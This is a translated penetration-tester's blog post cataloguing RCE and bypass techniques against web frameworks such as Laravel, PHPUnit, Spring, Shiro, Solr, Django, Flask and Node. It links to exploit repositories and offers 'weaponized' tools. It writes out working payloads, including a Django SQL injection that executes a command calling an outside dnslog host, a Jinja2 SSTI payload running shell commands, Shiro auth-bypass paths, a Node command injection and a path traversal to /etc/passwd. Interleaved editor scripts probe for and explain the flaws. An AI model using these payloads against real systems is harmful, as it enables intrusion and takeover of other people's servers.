Preface

Why the sudden jump to framework security? At today's level of security awareness, systems are generally upgraded, or patched promptly once a vulnerability is reported, so the chance of a framework handing you direct RCE is slim. And yet an asset like that really did land in my hands.

This post summarizes common RCE techniques against well-known frameworks, along with some one-click scripts. Those who come later rest in the shade of trees planted by those before them, and being a script kiddie is fun too, isn't it?

The post will be kept up to date, like a repository, so that fellow practitioners can look things up quickly.

No more chatter, let's get straight to it (manual doge).

Mind map

First, a mind map (the diagram is Xiaodi's, borrowed for this post).

Basics

Middleware and frameworks:

IIS, Apache, Nginx, Tomcat, Docker, K8s, WebLogic, JBoss, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, ThinkPHP, Spring, Flask, jQuery, etc.

1. Development frameworks, PHP: Laravel, ThinkPHP

2. Development frameworks, Java web: Struts2, Spring

3. Development frameworks, Python: Django, Flask

4. Development frameworks, JavaScript: Node.js, jQuery

5. Other frameworks, Java: Apache Shiro & Apache Solr

Common frameworks by language:

PHP: ThinkPHP, Laravel, Yii, CodeIgniter, CakePHP, Zend, etc.

Java: Spring, MyBatis, Hibernate, Struts2, Spring Boot, etc.

Python: Django, Flask, Bottle, TurboGears, Tornado, Web2py, etc.

JavaScript: Vue.js, Node.js, Bootstrap, jQuery, Angular, etc.

PHP: ThinkPHP & Laravel

Laravel

CVE-2021-3129 RCE

Laravel <= 8.4.2. The bug is in the bundled Ignition error page (facade/ignition < 2.5.2) and is only reachable when the app runs with APP_DEBUG=true; the same Laravel version in production mode is not exploitable this way, so check for the debug error page before spending time on the exploit.

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

ThinkPHP 3.x RCE / 5.x RCE

ThinkPHP is an open-source, lightweight PHP web application framework.

ThinkPHP dedicated scanners:

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3

PHPUnit

eval-stdin.php remote code execution, CVE-2017-9841 (PHPUnit before 4.8.28 and 5.x before 5.6.3)

Vulnerable file: vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php. The script evaluates whatever PHP it reads from stdin, which for a web request is the POST body, so the body must begin with "<?php" and Content-Length must match it exactly. The post shows only the headers; the 21-byte body below is a harmless probe added here so the request is complete:

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: <target>
Content-Length: 21
Accept-Encoding: gzip

<?php echo md5(1); ?>

A response containing the 32-character hex digest means the body was executed.
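A check for this, as an added example (not from the post or from any of the linked tools): it proves execution with an md5() echo rather than by running attacker code. The candidate paths other than the vendor/ one on the page, and the probe string, are assumptions.

```python
"""Probe for CVE-2017-9841 (PHPUnit eval-stdin.php) without running attacker code.

Added example, not from the post or any linked tool. eval-stdin.php evaluates
the PHP in the request body, so a harmless md5() echo proves execution: the
server can only return the digest if it ran the body.
"""
import hashlib
import urllib.error
import urllib.request

# Candidate locations of the vulnerable file. The vendor/ path is the one on
# the page; the others are assumptions about where composer trees end up.
PATHS = [
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/vendor/phpunit/src/Util/PHP/eval-stdin.php",
    "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
]

PROBE_SEED = "cve-2017-9841-probe"                  # constructed marker
PROBE_BODY = f'<?php echo md5("{PROBE_SEED}"); ?>'  # must start with "<?php"


def expected_marker() -> str:
    """Digest PHP will print if, and only if, the body was evaluated."""
    return hashlib.md5(PROBE_SEED.encode()).hexdigest()


def build_request(base_url: str, path: str) -> urllib.request.Request:
    """Same shape as the raw HTTP request on the page: POST, PHP as the body.
    urllib sets Content-Length to the exact body length for us."""
    return urllib.request.Request(
        base_url.rstrip("/") + path,
        data=PROBE_BODY.encode(),
        method="POST",
        headers={"Content-Type": "text/plain", "Accept-Encoding": "identity"},
    )


def executed(response_body: str) -> bool:
    """True only when the response carries the digest, i.e. the PHP ran.
    A 200 that merely serves the file or echoes our input does not count."""
    return expected_marker() in response_body


def scan(base_url: str, timeout: float = 5.0) -> list:
    """Return the paths on base_url that executed the probe (network call)."""
    hits = []
    for path in PATHS:
        try:
            with urllib.request.urlopen(build_request(base_url, path), timeout=timeout) as resp:
                if executed(resp.read().decode(errors="replace")):
                    hits.append(path)
        except (urllib.error.URLError, OSError, ValueError):
            continue
    return hits


if __name__ == "__main__":
    import sys
    for hit in scan(sys.argv[1]):
        print("VULNERABLE:", hit)
```

Run it as `python probe.py http://target`; a 404 or a text echo of the body is a miss, only the digest counts as a hit.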

Java: Spring & Struts2 & Shiro & Solr

Struts2

Arsenal: Struts2 dedicated scanner

Download link at the end of the article

S2-062, CVE-2021-31805 (OGNL double evaluation in tag attributes, the incomplete fix for S2-061; Struts 2.0.0 to 2.5.29)

https://github.com/YanMu2020/s2-062

Spring

Spring Boot vulnerability notes, exploitation methods and tricks (collection; most chains start from an exposed actuator endpoint such as env, jolokia or heapdump)

https://github.com/LandGrey/SpringBootVulExploit

Spring Boot

https://github.com/0x727/SpringBootExploit

https://github.com/WhiteHSBG/JNDIExploit

Spring Cloud Function (SpEL injection through the spring.cloud.function.routing-expression request header, CVE-2022-22963)

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

Spring Cloud Gateway (SpEL injection through the gateway actuator endpoint, CVE-2022-22947; only exploitable when that endpoint is exposed over HTTP)

https://github.com/An0th3r/CVE-2022-22947-exp
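The actuator-based chains in the collections above each start from one specific exposed endpoint, and CVE-2022-22947 needs the gateway endpoint exposed, so the first triage step is reading the /actuator index. The script below is an added example, not code from the post or from the linked repositories; the sample index JSON is constructed, and the risk notes are the editor's summary of why each endpoint matters.

```python
"""Triage Spring Boot actuator exposure from the /actuator index.

Added example, not from the post or the linked repositories. Spring Boot 2.x
lists its exposed endpoints as HAL links at /actuator; the exploit collections
linked above all start from one of the endpoints below, so the first thing
to check is which of them the target exposes. Risk notes are the editor's.
"""
import json
import urllib.request

# Endpoint name -> why it matters. Facts about the endpoints, not target-specific.
DANGEROUS = {
    "env": "config and credentials; POST /env + POST /refresh is the property-injection RCE chain in SpringBootVulExploit",
    "refresh": "re-reads config, needed to trigger properties injected through /env",
    "restart": "restarts the context, same use as refresh",
    "heapdump": "JVM heap download, frequently contains plaintext secrets",
    "jolokia": "JMX over HTTP; the Logback/Realm JNDI chains in SpringBootVulExploit go through it",
    "gateway": "Spring Cloud Gateway routes; SpEL injection CVE-2022-22947",
    "shutdown": "stops the application",
    "logfile": "log disclosure",
    "mappings": "full route listing, useful for recon",
}

# Constructed sample of a Boot 2.x /actuator response (not captured from a real host).
SAMPLE_INDEX = json.dumps({
    "_links": {
        "self": {"href": "http://127.0.0.1:8080/actuator", "templated": False},
        "health": {"href": "http://127.0.0.1:8080/actuator/health", "templated": False},
        "health-path": {"href": "http://127.0.0.1:8080/actuator/health/{*path}", "templated": True},
        "env": {"href": "http://127.0.0.1:8080/actuator/env", "templated": False},
        "env-toMatch": {"href": "http://127.0.0.1:8080/actuator/env/{toMatch}", "templated": True},
        "heapdump": {"href": "http://127.0.0.1:8080/actuator/heapdump", "templated": False},
        "gateway": {"href": "http://127.0.0.1:8080/actuator/gateway", "templated": False},
    }
})


def exposed_endpoints(index_json: str) -> set:
    """Endpoint names from a HAL index. Templated sub-links such as
    "env-toMatch" are collapsed onto their parent endpoint "env" (heuristic:
    Boot names them "<endpoint>-<variable>")."""
    links = json.loads(index_json).get("_links", {})
    names = set()
    for name in links:
        if name == "self":
            continue
        names.add(name.split("-", 1)[0])
    return names


def triage(index_json: str) -> dict:
    """Map each exposed dangerous endpoint to its risk note, sorted by name."""
    return {n: DANGEROUS[n] for n in sorted(exposed_endpoints(index_json)) if n in DANGEROUS}


def fetch_index(base_url: str, timeout: float = 5.0) -> str:
    """Network helper: GET <base>/actuator. Boot 1.x serves endpoints at the
    context root instead and is not covered here."""
    req = urllib.request.Request(base_url.rstrip("/") + "/actuator",
                                 headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    import sys
    data = fetch_index(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_INDEX
    for name, why in triage(data).items():
        print(f"{name:10s} {why}")
```

With no argument it triages the constructed sample; with a base URL it fetches the live index. A 404 on /actuator does not mean the endpoints are absent, since management.endpoints.web.base-path may have been changed.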

Apache Shiro

Fingerprint: most often seen at the login form; the response carries Set-Cookie: rememberMe=deleteMe. Sending any request with the header Cookie: rememberMe=1 makes a Shiro-backed app answer with that Set-Cookie, so the check works on any page, not just the login.

Vulnerability list: https://avd.aliyun.com/search?q=shiro

Apache Shiro <= 1.2.4 default (hard-coded) rememberMe AES key, command execution, CVE-2016-4437 (Shiro-550)

Apache Shiro < 1.3.2 authentication bypass, CVE-2016-2807

Apache Shiro < 1.4.2 rememberMe cookie padding oracle, CVE-2019-12422 (Shiro-721)

Apache Shiro < 1.5.2 authentication bypass, CVE-2020-1957

Apache Shiro < 1.5.3 authentication bypass, CVE-2020-11989

Apache Shiro < 1.6.0 authentication bypass, CVE-2020-13933

Apache Shiro < 1.7.1 authorization bypass, CVE-2020-17523

CVE-2016-4437 (Shiro-550) + Shiro-721 (CVE-2019-12422)

CVE-2020-17523

PoC:

/admin/%20

Affected: Apache Shiro < 1.7.1

https://github.com/jweny/shiro-cve-2020-17523

CVE-2020-1957

PoC:

/xxx/..;/admin/

Affected: Apache Shiro < 1.5.2. The ..;/ trick works because Shiro matched its filter chains against the raw request URI while the servlet container resolved the same request to /admin/; 1.5.2 switched Shiro to the container's path.
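Why the PoC above works comes down to two components parsing one path differently. The script below is an added example (not Shiro or Tomcat code) that models that differential for the ..;/ case of CVE-2020-1957: the old Shiro view, the container's view, and the 1.5.2 fix which adopts the container's path. The %20 case of CVE-2020-17523 depends on AntPathMatcher trimming and is not modelled. The chain definitions are an assumption, a typical shiro.ini [urls] block.

```python
"""Parser differential behind the CVE-2020-1957 PoC /xxx/..;/admin/.

Added example, not Shiro or Tomcat code. Shiro < 1.5.2 built the path it
matched filter chains against from the raw request URI: percent-decode, cut
at the first ';', never resolve '..'. The servlet container strips ';param'
from every segment and resolves '..' before routing, and Spring MVC routes on
that cleaned path. Shiro 1.5.2 switched to the container's servletPath +
pathInfo, so both sides see the same path. The functions below are
simplified models of those three views, not copies of either code base.
"""
from urllib.parse import unquote


def ant_match(pattern: str, path: str) -> bool:
    """Just enough Ant matching for the patterns used here: exact, or '/**'."""
    if pattern.endswith("/**"):
        prefix = pattern[:-3]
        return path == prefix or path.startswith(prefix + "/")
    return pattern == path


def shiro_old_view(uri: str) -> str:
    """Shiro < 1.5.2 (model): decode, truncate at the first ';', keep '..'."""
    return unquote(uri).split(";", 1)[0]


def container_view(uri: str) -> str:
    """Container routing (model): drop ';...' per segment, decode, resolve '.' and '..'."""
    stack = []
    for seg in unquote(uri).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    path = "/" + "/".join(stack)
    if uri.endswith("/") and path != "/":
        path += "/"
    return path


def shiro_fixed_view(uri: str) -> str:
    """Shiro >= 1.5.2 (model): match on servletPath + pathInfo, i.e. the container's view."""
    return container_view(uri)


# Assumed shiro.ini [urls] block; order matters, first match wins.
CHAINS = [("/admin/**", "authc"), ("/**", "anon")]


def resolve_chain(path_seen_by_shiro: str) -> str:
    """First matching chain wins, as in PathMatchingFilterChainResolver."""
    for pattern, chain in CHAINS:
        if ant_match(pattern, path_seen_by_shiro):
            return chain
    return "anon"


def bypass(uri: str, shiro=shiro_old_view) -> bool:
    """True when the container routes `uri` under /admin/ but the Shiro model
    selects a chain other than authc for it."""
    routed = container_view(uri)
    return ant_match("/admin/**", routed) and resolve_chain(shiro(uri)) != "authc"


if __name__ == "__main__":
    for u in ("/admin/", "/xxx/..;/admin/", "/admin/..;/admin/"):
        print(f"{u:20s} old: {bypass(u)!s:6s} fixed: {bypass(u, shiro_fixed_view)}")
```

The same differential explains why the fix had to change where Shiro takes the path from rather than add one more pattern: any normalization step the container performs and Shiro does not is a potential bypass.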

Weaponized versions: download link at the end of the article.

Apache Solr

Apache Solr Exploits 🌟

https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629

CVE-2019-0193 (DataImportHandler: the dataConfig parameter accepts a script inside the import config, RCE)

CVE-2019-0192 (Config API jmx.serviceUrl points JMX at an attacker-controlled RMI server, deserialization RCE)

CVE-2019-17558 (VelocityResponseWriter template injection, RCE)

CVE-2017-12629 (XXE plus RunExecutableListener, RCE)

CVE-2019-12409 (8.1.1 and 8.2.0 shipped with ENABLE_REMOTE_JMX_OPTS=true, unauthenticated JMX)

CVE-2020-13957 (ConfigSet API upload restriction bypass, RCE)

CVE-2018-8026 (XXE)

CVE-2021-27905 Apache Solr file read & SSRF (ReplicationHandler masterUrl)

https://github.com/murataydemir/CVE-2021-27905

Python: Django, Flask & MotionEye

Django

CVE-2019-14234: SQL injection through JSONField/HStoreField key lookups (Django before 1.11.23, 2.1.11 and 2.2.4; PostgreSQL only). In the admin change list the key of a detail__<key> filter was spliced into the SQL unescaped. The command-execution step below additionally requires the database role to be allowed COPY ... FROM PROGRAM (a superuser, or a member of pg_execute_server_program).

Single quote injected successfully; the SQL statement errors:

/admin/vuln/collection/?detail__a%27b=123

Create the cmd_exec table:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

Execute a command through cmd_exec (confirmed out of band via DNS):

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20
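To see what the three URLs above turn into on the database side, this added example (not Django's code) decodes each one the way the admin does and renders the SQL shape the vulnerable key transform produced next to the parameterized shape of the fix. The table and column names come from the page's URLs; the SELECT prefix is a placeholder and the quoting is a model of Django's, not a copy.

```python
"""What the three PoC URLs above become on the SQL side (CVE-2019-14234).

Added example, not Django code. In the vulnerable releases the PostgreSQL
JSONField/HStoreField key transform produced its SQL with the key spliced in
as a quoted literal, roughly "(%s -> '%s')" % (lhs, key_name), while the
comparison value was already a bound parameter. The admin change list takes
the key straight from the ?detail__<key> query parameter. The fix emits
"(%s -> %s)" and hands key_name to the driver as a parameter too. The
SELECT prefix is a placeholder; table and column names are from the URLs.
"""
from urllib.parse import parse_qsl

LOOKUP_PREFIX = "detail__"   # JSONField `detail` on the page's vuln_collection model
LHS = '"vuln_collection"."detail"'


def key_from_query(query_string: str) -> tuple:
    """Admin change-list filter: everything after `detail__` in the parameter
    name is the JSON key; the parameter value is the comparison value."""
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name.startswith(LOOKUP_PREFIX):
            return name[len(LOOKUP_PREFIX):], value
    raise ValueError("no detail__ lookup in query string")


def vulnerable_sql(key: str, value: str) -> tuple:
    """Pre-fix shape: key spliced in as a literal, nothing escaped, so a quote
    in the key closes the literal and the rest of the key runs as SQL."""
    return "SELECT ... WHERE (%s -> '%s') = %%s" % (LHS, key), [value]


def fixed_sql(key: str, value: str) -> tuple:
    """Post-fix shape: key and value are both parameters quoted by the driver."""
    return "SELECT ... WHERE (%s -> %%s) = %%s" % LHS, [key, value]


PAGE_POCS = [   # query strings of the three URLs on the page
    "detail__a%27b=123",
    "detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20",
    "detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20",
]

if __name__ == "__main__":
    for qs in PAGE_POCS:
        key, value = key_from_query(qs)
        print("key        :", repr(key))
        print("vulnerable :", vulnerable_sql(key, value))
        print("fixed      :", fixed_sql(key, value))
        print()
```

Note that the second and third PoCs contain no literal "=": the %3d is part of the parameter name, so the whole injected SQL rides in the key and the value is empty. The stacked statement after ";" runs because psycopg2 sends the string as one multi-statement query.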

CVE-2020-7471: SQL injection through the delimiter argument of StringAgg (Django before 1.11.28, 2.2.10 and 3.0.3)

https://github.com/huzaifakhan771/CVE-2020-7471-Django

CVE-2021-35042: SQL injection through QuerySet.order_by() when the field name comes from user input (Django 3.1 before 3.1.13 and 3.2 before 3.2.5); the PoCs below use MySQL's updatexml() for error-based extraction.

Install directory:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23

Version:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23

Database name:

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23

Flask Jinja2 SSTI

Flask is a lightweight web application framework written in Python; its WSGI toolkit is Werkzeug and its template engine is Jinja2. SSTI arises when user input is concatenated into the template source, e.g. render_template_string("Hello " + name), instead of being passed as a template variable, render_template_string("Hello {{ name }}", name=name).

Payload as sent in the query string:

?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

The same payload decoded. It walks from the literal [] up to object, finds the catch_warnings class among object's subclasses, reaches the warnings module's globals through its __init__, picks out the __builtins__ dict and calls its eval:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
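The payload is easier to follow when the same walk is done in plain Python outside a template. The script below is an added example, not from the post; it reaches eval the same way the payload does and evaluates a harmless expression instead of popen("id"). It needs neither Flask nor Jinja2 installed, which is the point: everything the template can reach is ordinary interpreter state.

```python
"""The object walk behind the Jinja2 SSTI payload above, in plain Python.

Added example, not from the post. The payload never imports anything: it
starts from the literal [] and walks the class graph to the interpreter's
builtins. A plain Flask app renders with an unsandboxed Jinja2 environment,
so whatever this walk reaches in Python, the template can reach too.
"""


def find_gadget_class(name: str = "catch_warnings"):
    """Step 1 of the payload: [].__class__.__base__ is `object`, and every
    loaded direct subclass of object is in object.__subclasses__().
    warnings.catch_warnings is always loaded by CPython, so payloads pick it."""
    for cls in [].__class__.__base__.__subclasses__():
        if cls.__name__ == name:
            return cls
    return None


def builtins_via(cls) -> dict:
    """Step 2: a Python-level __init__ carries its module's globals, and a
    module's globals hold __builtins__, a dict with eval/open/__import__.
    The payload scans the values for a dict that has an 'eval' key."""
    for value in cls.__init__.__globals__.values():
        if value.__class__ == {}.__class__ and "eval" in value:
            return value
    raise LookupError("no builtins dict reachable from %r" % cls)


def ssti_eval(expression: str):
    """Step 3: b['eval'](...) in the payload. Here a harmless expression;
    the page's payload passes __import__("os").popen("id").read()."""
    return builtins_via(find_gadget_class())["eval"](expression)


# Flask side, for reference only (not executed here, so Flask is not needed):
# VULNERABLE: render_template_string("Hello " + request.args["name"])
#             user input becomes template source and the walk above runs.
# FIXED:      render_template_string("Hello {{ name }}", name=request.args["name"])
#             user input is a value; it is escaped, never compiled.


if __name__ == "__main__":
    print(find_gadget_class())
    print(ssti_eval("6*7"))
```

Blocking "catch_warnings" by name is no defence: any class whose __init__ is Python code exposes its module's globals the same way, and many other subclasses of object qualify.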

MotionEye

Information disclosure, CVE-2022-25568

MotionEye <= 0.42.1

/config/list

JavaScript: jQuery & Node

jQuery

jQuery Upload File <= 4.0.2 arbitrary file upload

curl -F "myfile=@php.php" "url"

XSS payloads

https://github.com/mahp/jQuery-with-XSS

Node.js

CVE-2021-21315

systeminformation < 5.3.1 (command injection: parameters such as name were only sanitized as strings, so passing them as an array got past the check before they reached a shell command)

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

PoC

/api/getServices?name[]=$(echo -e 'ckcsec' > test.txt)

CVE-2017-14849

Path traversal in Node.js 8.5.0 (fixed in 8.6.0): path normalization mishandled ".." following an "a/../" sequence, so express.static could be walked out of its root.

GET:

/static/../../../a/../../../../etc/passwd